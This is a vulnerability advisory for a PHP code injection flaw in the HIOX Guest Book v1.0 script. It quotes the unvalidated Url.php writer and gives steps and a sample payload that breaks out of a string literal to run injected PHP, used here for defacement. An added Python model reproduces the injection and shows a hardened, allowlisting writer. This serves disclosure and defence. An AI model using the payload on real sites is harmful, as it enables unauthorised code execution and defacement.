HIOX GUEST BOOK DB based utility V1.0 PHP Injection Vulnerability

2014-01-05 17:09:35
Submitted by: JoKeR_StEx

#############################################################################

# Exploit Title : HIOX GUEST BOOK DB based utility V1.0 PHP Injection Vulnerability

# Author : JoKeR_StEx

# Tested On : Windows

# Download Software Link : www.hscripts.com/scripts/php/downloads/HGB.zip

# Date : 04/01/2014

#############################################################################

[+] About Script
Release Date - 02-04-2011
Version : HGB DB based utility v1.0

Bug in file : Url.php

[+] Vulnerable Code :

<?php
// Url.php: the six colour/flag settings are taken straight from POST and
// written into col.php as PHP source, with no authentication and no validation.
$iswrite = $_POST['what'];

if($iswrite == "write")
{
$bx = $_POST['Box'];
$bd = $_POST['Body'];
$fc = $_POST['Font'];
$omc = $_POST['Odd'];
$emc = $_POST['Even'];
$htmle = $_POST['var'];
$file = fopen('col.php','w');

fwrite($file,"<?php\n\n");
// Each value is interpolated inside a double-quoted PHP string literal, so a
// value containing "; closes the literal and whatever follows it is executed
// the next time col.php is included.
fwrite($file,"$"."bxcolor = \"$bx\";\n");
fwrite($file,"$"."bdcolor = \"$bd\";\n");
fwrite($file,"$"."fontcol = \"$fc\";\n");
fwrite($file,"$"."oddmess = \"$omc\";\n");
fwrite($file,"$"."evenmess = \"$emc\";\n");
fwrite($file,"$"."html_enable = \"$htmle\";\n\n");
fclose($file);
}
?>

[+] To inject code: send a POST request to Url.php with what=write and put PHP in one of the colour fields (for example Box), using a value that closes the double-quoted string and appends a statement of your own, such as a print of <h1>Hacked By JoKeR_StEx</h1>. The value is written verbatim into col.php and executes whenever that file is included. The request can be crafted with a tool such as the Live HTTP Headers browser extension. The snippet above performs no authentication and no input validation, so nothing restricts who can trigger the write.
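The following Python model is an added example, not code from the advisory or from the HIOX script. It reproduces the string construction that Url.php performs so the effect of an injected value can be seen without a PHP install, then shows a hardened writer. The colour format (#rrggbb), the 0/1 meaning of the html_enable flag, the sample POST values and the attacker string are all assumptions made for the example; the hardened version is a suggested fix, not the vendor's.

```python
import re

# Field order and PHP variable names exactly as Url.php writes them into col.php.
FIELDS = [
    ("Box", "bxcolor"), ("Body", "bdcolor"), ("Font", "fontcol"),
    ("Odd", "oddmess"), ("Even", "evenmess"), ("var", "html_enable"),
]

# Constructed sample of a normal admin submission. The colour values are
# assumed to be CSS hex colours; the original script documents no format.
BENIGN_POST = {
    "Box": "#ffffff", "Body": "#000000", "Font": "#333333",
    "Odd": "#eeeeee", "Even": "#dddddd", "var": "1",
}

# Constructed attacker value for one field: closes the double-quoted literal
# and the statement, appends arbitrary PHP, then comments out the rest of the
# line so the generated file still parses.
MALICIOUS_BOX = '"; print "<h1>Hacked By JoKeR_StEx</h1>"; //'


def render_col_php_vulnerable(post):
    """Reproduce what the fwrite() calls in Url.php emit: every POST value
    is interpolated raw into a double-quoted PHP string literal."""
    lines = ["<?php", ""]
    for post_key, php_var in FIELDS:
        lines.append(f'${php_var} = "{post[post_key]}";')
    return "\n".join(lines) + "\n\n"


# One assignment per line, a quoted literal with no quote or backslash inside:
# the only shape col.php should ever contain.
ASSIGNMENT = re.compile(r"""\A\$[A-Za-z_]\w* = (?:"[^"\\]*"|'[^'\\]*');\Z""")


def is_well_formed_config(php_source):
    """True if the file is nothing but <?php followed by simple assignments."""
    lines = php_source.splitlines()
    if not lines or lines[0] != "<?php":
        return False
    return all(ASSIGNMENT.match(line) for line in lines[1:] if line.strip())


HEX_COLOUR = re.compile(r"\A#[0-9A-Fa-f]{6}\Z")


def render_col_php_safe(post):
    """Hardened writer (assumed fix, not the vendor's): allowlist every value
    before it reaches the file, then emit it as an escaped single-quoted
    literal so the allowlist is not the only line of defence."""
    lines = ["<?php", ""]
    for post_key, php_var in FIELDS:
        value = str(post.get(post_key, ""))
        if post_key == "var":
            if value not in ("0", "1"):  # assumed on/off flag
                raise ValueError(f"{post_key}: expected 0 or 1")
        elif not HEX_COLOUR.match(value):
            raise ValueError(f"{post_key}: not a #rrggbb colour")
        escaped = value.replace("\\", "\\\\").replace("'", "\\'")
        lines.append(f"${php_var} = '{escaped}';")
    return "\n".join(lines) + "\n\n"


if __name__ == "__main__":
    attack = dict(BENIGN_POST, Box=MALICIOUS_BOX)
    generated = render_col_php_vulnerable(attack)
    print(generated)
    print("well formed:", is_well_formed_config(generated))
```

Run as a script, the model prints the col.php that the vulnerable writer would produce for the attacker's Box value; the bxcolor line contains a second statement after the closed literal, which is why the well-formedness check reports it. Validation alone would close this hole, but the escaped single-quoted literal means a later, looser allowlist (named colours, for instance) cannot reopen it. In the real application the write also needs to be restricted to authenticated administrators, which the model does not cover.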

################################################################################
# The Black Devils
# Dz Crazy L33ts
################################################################################
email : [email protected]
Facebook : fb.me/imadlilong.lasvegas
twitter : @JoKeR_StEx


Fixes

No fixes
